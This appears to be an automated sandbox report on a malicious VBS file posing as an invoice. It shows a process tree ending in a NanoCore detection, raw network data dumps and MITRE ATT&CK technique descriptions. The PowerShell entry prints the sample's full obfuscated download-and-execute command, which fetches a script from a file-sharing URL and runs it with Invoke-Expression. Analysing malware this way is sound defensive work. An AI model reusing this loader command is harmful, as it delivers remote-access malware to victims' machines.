2021-09-14 19:24:32 UTC	474	IN	Data Raw: 30 2d 33 32 2d 34 31 2d 34 32 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 32 2d 33 30 2d 33 30 2d 33 31 2d 33 30 2d 33 30 2d 34 32 2d 33 35 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 31 2d 33 30 2d 33 30 2d 34 32 2d 33 35 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 32 2d 33 30 2d 33 30 2d 33 32 2d 33 30 2d 33 30 2d 34 32 2d 34 35 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 31 2d 33 30 2d 33 30 2d 34 32 2d 33 35 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 32 2d 33 30 2d 33 30 2d 34 32 2d 34 35 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 31 2d 33 30 2d 33 30 2d 33 38 2d 34 33 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 32 2d 33 30 2d 33 Data Ascii: 0-32-41-42-30-30-30-30-32-30-30-31-30-30-42-35-30-30-30-30-30-30-30-31-30-30-42-35-30-30-30-30-32-30-30-32-30-30-42-45-30-30-30-30-30-30-30-31-30-30-42-35-30-30-30-30-30-30-30-32-30-30-42-45-30-30-30-30-30-30-30-31-30-30-38-43-30-30-30-30-30-30-30-32-30-3
2021-09-14 19:24:32 UTC	481	IN	Data Raw: 2d 34 36 2d 33 33 2d 33 30 2d 33 33 2d 34 32 2d 33 32 2d 33 30 2d 33 30 2d 34 34 2d 33 31 2d 33 30 2d 33 30 2d 34 36 2d 33 33 2d 33 30 2d 33 33 2d 34 36 2d 33 34 2d 33 30 2d 33 32 2d 34 34 2d 33 39 2d 33 30 2d 33 30 2d 34 36 2d 33 33 2d 33 30 2d 33 33 2d 34 32 2d 33 32 2d 33 30 2d 33 30 2d 34 35 2d 33 31 2d 33 30 2d 33 30 2d 34 36 2d 33 33 2d 33 30 2d 33 33 2d 33 32 2d 33 31 2d 33 30 2d 33 33 2d 34 36 2d 33 31 2d 33 30 2d 33 30 2d 34 36 2d 33 33 2d 33 30 2d 33 33 2d 33 33 2d 33 30 2d 33 30 2d 33 33 2d 34 36 2d 33 39 2d 33 30 2d 33 30 2d 34 36 2d 33 33 2d 33 30 2d 33 33 2d 33 33 2d 33 30 2d 33 30 2d 33 33 2d 33 30 2d 33 31 2d 33 30 2d 33 31 2d 34 36 2d 33 33 2d 33 30 2d 33 33 2d 33 33 2d 33 30 2d 33 30 2d 33 33 2d 33 30 2d 33 39 2d 33 30 2d 33 31 2d 34 36 Data Ascii: -46-33-30-33-42-32-30-30-44-31-30-30-46-33-30-33-46-34-30-32-44-39-30-30-46-33-30-33-42-32-30-30-45-31-30-30-46-33-30-33-32-31-30-33-46-31-30-30-46-33-30-33-33-30-30-33-46-39-30-30-46-33-30-33-33-30-30-33-30-31-30-31-46-33-30-33-33-30-30-33-30-39-30-31-46
2021-09-14 19:24:32 UTC	489	IN	Data Raw: 33 30 2d 33 35 2d 33 33 2d 33 37 2d 33 34 2d 33 37 2d 33 32 2d 33 36 2d 33 39 2d 33 36 2d 34 35 2d 33 36 2d 33 37 2d 33 30 2d 33 30 2d 33 36 2d 33 37 2d 33 36 2d 33 35 2d 33 37 2d 33 34 2d 33 35 2d 34 36 2d 33 34 2d 34 33 2d 33 36 2d 33 35 2d 33 36 2d 34 35 2d 33 36 2d 33 37 2d 33 37 2d 33 34 2d 33 36 2d 33 38 2d 33 30 2d 33 30 2d 33 36 2d 33 39 2d 33 30 2d 33 30 2d 33 36 2d 34 31 2d 33 30 2d 33 30 2d 33 34 2d 33 31 2d 33 37 2d 33 33 2d 33 37 2d 33 39 2d 33 36 2d 34 35 2d 33 36 2d 33 33 2d 33 34 2d 33 33 2d 33 36 2d 33 31 2d 33 36 2d 34 33 2d 33 36 2d 34 33 2d 33 36 2d 33 32 2d 33 36 2d 33 31 2d 33 36 2d 33 33 2d 33 36 2d 34 32 2d 33 30 2d 33 30 2d 33 34 2d 34 34 2d 33 36 2d 33 31 2d 33 37 2d 33 32 2d 33 37 2d 33 33 2d 33 36 2d 33 38 2d 33 36 2d 33 31 2d Data Ascii: 30-35-33-37-34-37-32-36-39-36-45-36-37-30-30-36-37-36-35-37-34-35-46-34-43-36-35-36-45-36-37-37-34-36-38-30-30-36-39-30-30-36-41-30-30-34-31-37-33-37-39-36-45-36-33-34-33-36-31-36-43-36-43-36-32-36-31-36-33-36-42-30-30-34-44-36-31-37-32-37-33-36-38-36-31-
2021-09-14 19:24:32 UTC	496	IN	Data Raw: 30 2d 33 35 2d 33 30 2d 33 38 2d 33 30 2d 33 34 2d 33 30 2d 33 30 2d 33 30 2d 33 31 2d 33 30 2d 33 38 2d 33 30 2d 33 39 2d 33 30 2d 33 35 2d 33 30 2d 33 30 2d 33 30 2d 33 31 2d 33 31 2d 33 32 2d 33 33 2d 34 34 2d 33 30 2d 33 38 2d 33 30 2d 33 34 2d 33 30 2d 34 31 2d 33 30 2d 33 31 2d 33 31 2d 33 32 2d 33 30 2d 34 33 2d 33 30 2d 33 34 2d 33 30 2d 34 31 2d 33 30 2d 33 31 2d 33 31 2d 33 32 2d 33 31 2d 33 30 2d 33 30 2d 33 34 2d 33 30 2d 34 31 2d 33 30 2d 33 31 2d 33 31 2d 33 32 2d 33 31 2d 33 34 2d 33 30 2d 33 34 2d 33 30 2d 34 31 2d 33 30 2d 33 31 2d 33 31 2d 33 32 2d 33 31 2d 33 38 2d 33 30 2d 33 34 2d 33 30 2d 34 31 2d 33 30 2d 33 31 2d 33 31 2d 33 32 2d 33 31 2d 34 33 2d 33 30 2d 33 34 2d 33 30 2d 34 31 2d 33 30 2d 33 31 2d 33 31 2d 33 32 2d 33 32 2d 33 Data Ascii: 0-35-30-38-30-34-30-30-30-31-30-38-30-39-30-35-30-30-30-31-31-32-33-44-30-38-30-34-30-41-30-31-31-32-30-43-30-34-30-41-30-31-31-32-31-30-30-34-30-41-30-31-31-32-31-34-30-34-30-41-30-31-31-32-31-38-30-34-30-41-30-31-31-32-31-43-30-34-30-41-30-31-31-32-32-3
2021-09-14 19:24:32 UTC	503	IN	Data Raw: 2d 33 34 2d 33 33 2d 33 30 2d 33 30 2d 33 36 2d 34 36 2d 33 30 2d 33 30 2d 33 36 2d 34 34 2d 33 30 2d 33 30 2d 33 36 2d 34 34 2d 33 30 2d 33 30 2d 33 36 2d 33 35 2d 33 30 2d 33 30 2d 33 36 2d 34 35 2d 33 30 2d 33 30 2d 33 37 2d 33 34 2d 33 30 2d 33 30 2d 33 37 2d 33 33 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 32 2d 33 32 2d 33 30 2d 33 30 2d 33 30 2d 33 31 2d 33 30 2d 33 30 2d 33 30 2d 33 31 2d 33 30 2d 33 30 2d 33 34 2d 33 33 2d 33 30 2d 33 30 2d 33 36 2d 34 36 2d 33 30 2d 33 30 2d 33 36 2d 34 34 2d 33 30 2d 33 30 2d 33 37 2d 33 30 2d 33 30 2d 33 30 2d 33 36 2d 33 31 2d 33 30 2d 33 30 2d 33 36 2d 34 35 2d 33 30 2d 33 30 2d 33 37 2d 33 39 2d 33 30 2d 33 30 2d 33 34 Data Ascii: -34-33-30-30-36-46-30-30-36-44-30-30-36-44-30-30-36-35-30-30-36-45-30-30-37-34-30-30-37-33-30-30-30-30-30-30-30-30-30-30-30-30-30-30-32-32-30-30-30-31-30-30-30-31-30-30-34-33-30-30-36-46-30-30-36-44-30-30-37-30-30-30-36-31-30-30-36-45-30-30-37-39-30-30-34
2021-09-14 19:24:32 UTC	510	IN	Data Raw: 37 39 2d 37 34 2d 36 35 2d 35 62 2d 35 64 2d 35 64 2d 32 34 2d 34 38 2d 33 36 2d 33 64 2d 32 30 2d 35 36 2d 34 39 2d 35 30 2d 32 30 2d 32 34 2d 34 38 2d 34 38 2d 30 61 2d 32 34 2d 36 31 2d 36 31 2d 32 30 2d 33 64 2d 32 30 2d 32 37 2d 34 65 2d 34 35 2d 35 34 2d 32 65 2d 35 30 2d 34 35 2d 32 37 2d 30 61 2d 32 34 2d 36 32 2d 36 32 2d 32 30 2d 33 64 2d 32 30 2d 32 37 2d 34 32 2d 36 31 2d 36 34 2d 36 37 2d 36 35 2d 37 32 2d 32 37 2d 30 61 2d 32 34 2d 36 66 2d 36 66 2d 32 30 2d 33 64 2d 32 37 2d 34 37 2d 36 35 2d 37 34 2d 34 38 2d 34 39 2d 35 33 2d 35 34 2d 34 66 2d 35 32 2d 35 32 2d 35 39 2d 32 37 2d 32 65 2d 35 32 2d 36 35 2d 37 30 2d 36 63 2d 36 31 2d 36 33 2d 36 35 2d 32 38 2d 32 32 2d 34 38 2d 34 39 2d 35 33 2d 35 34 2d 34 66 2d 35 32 2d 35 32 2d 35 39 2d Data Ascii: 79-74-65-5b-5d-5d-24-48-36-3d-20-56-49-50-20-24-48-48-0a-24-61-61-20-3d-20-27-4e-45-54-2e-50-45-27-0a-24-62-62-20-3d-20-27-42-61-64-67-65-72-27-0a-24-6f-6f-20-3d-27-47-65-74-48-49-53-54-4f-52-52-59-27-2e-52-65-70-6c-61-63-65-28-22-48-49-53-54-4f-52-52-59-

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: wscript.exe PID: 2256 Parent PID: 3472

General

Start time:	21:23:33
Start date:	14/09/2021
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\9 ITEMS INVOICE RECEIPT.vbs'
Imagebase:	0x7ff6a86e0000
File size:	163840 bytes
MD5 hash:	9A68ADD12EB50DDE7586782C3EB9FF9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000000.00000003.433457033.00000268A5E21000.00000004.00000001.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000000.00000002.436664872.00000268A5E20000.00000004.00000001.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000000.00000002.435967518.00000268A409A000.00000004.00000001.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000000.00000003.435054293.00000268A4349000.00000004.00000001.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000000.00000003.434814918.00000268A4089000.00000004.00000001.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000000.00000002.436347834.00000268A434A000.00000004.00000040.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000000.00000002.435917609.00000268A408A000.00000004.00000001.sdmp, Author: Florian Roth
Reputation:	high

Chronological Activities

Analysis Process: powershell.exe PID: 964 Parent PID: 2256

General

Start time:	21:23:34
Start date:	14/09/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/DJr8t4/edrfH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%7-X-%c-X-%7-X-c-X-!9-X-!5-X-!e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!a-X-!b-X-%0-X-3d-X-%0-X-%7-X-!!-X-!f-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-1-X-!!-X-53-X-5!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%7-X-%c-X-%7-X-57-X-e-X-!c-X-f-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-7%-X-!9-X-e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!-X-5-X-!7-X-!8-X-!a-X-%0-X-3d-X-%7-X-!9-X-0-X-!5-X-58-X-%8-X-e-X-0-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-0-X-3-X-0-X-5!-X-%0-X-%!-X-!5-X-!!-X-5%-X-!-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-!%-X-!8-X-!e-X-!a-X-53-X-!!-X-!-X-!7-X-!8-X-%9-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-5-X-0-X-57-X-0-X-%d-X-!f-X-%-X-a-X-0-X-!5-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-!5-X-!-X-!7-X-!8-X-!a-X-%9-X-%e-X-%!-X-53-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!a-X-!b-X-%8-X-%!-X-53-X-5a-X-58-X-!!-X-!3-X-!-X-5-X-%7-X-%9-X-3b-X-0a-X-%-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-%8-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!-X-5-X-!7-X-!8-X-!a-X-%0-X-%d-X-!a-X-f-X-9-X-e-X-%0-X-%7-X-%7-X-%9-X-7c-X-%-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-3b'.Replace('%','2').Replace('!','4').Replace('','6');Invoke-Expression (-join ($SOS -split '-X-' \| ? { $_ } \| % { [char][convert]::ToUInt32($_,16) }))
Imagebase:	0x7ff617cb0000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000001.00000003.271462749.0000014681106000.00000004.00000001.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000001.00000002.428209979.0000014681671000.00000004.00000001.sdmp, Author: Florian Roth
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 3020 Parent PID: 964

General

Start time:	21:23:34
Start date:	14/09/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: aspnet_compiler.exe PID: 2272 Parent PID: 964

General

Start time:	21:24:57
Start date:	14/09/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Imagebase:	0xbc0000
File size:	55400 bytes
MD5 hash:	17CC69238395DF61AAF483BCEF02E7C9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: NanoCore, Description: unknown, Source: 0000000A.00000003.619763288.0000000004466000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	moderate

Chronological Activities

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.
Tactics:	Command and Control
Data Sources:	Network intrusion detection system, Network protocol analysis, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report 9 ITEMS INVOICE RECEIPT.vbs

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Overview

AV Detection:

E-Banking Fraud:

System Summary:

Stealing of Sensitive Information:

Remote Access Functionality:

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
